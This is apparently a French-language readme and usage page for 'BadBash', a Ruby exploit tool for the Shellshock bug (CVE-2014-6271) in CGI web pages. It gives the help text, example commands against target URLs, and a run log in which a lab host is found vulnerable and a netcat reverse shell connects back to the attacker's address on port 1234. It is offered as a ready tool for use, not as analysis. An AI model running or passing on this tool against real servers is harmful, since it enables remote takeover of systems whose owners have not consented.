
Outil RCE CVE-2014-6271
BadBash est un outil d'exploitation RCE pour CVE-2014-6271. La version de base ne vérifie que le site HTTP CGI et ne fournit qu'un reverse shell netcat sur le port 1234.
Développeur : Andy Yang Version : 0.1.0 Licence : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - outil RCE pour CVE-2014-6271 par Andy Yang La version de base ne vérifie que le site HTTP La version de base ne fournit qu'un reverse shell netcat sur le port 1234
EXEMPLE D'UTILISATION:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Full path of CGI page
-d, --Destination IP Your IP address that listen to an inbound connection
-h, --help Display help
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Vérification de la vulnérabilité de la cible........
[Info] Cela peut prendre jusqu'à 10 secondes........
[Info] La cible est vulnérable !!!
[Info] Veuillez utiliser NC pour écouter sur le port 1234 pour le reverse shell..........
[Info] Exploitation d'un reverse shell pour se connecter à 172.16.189.1:1234 via netcat ..........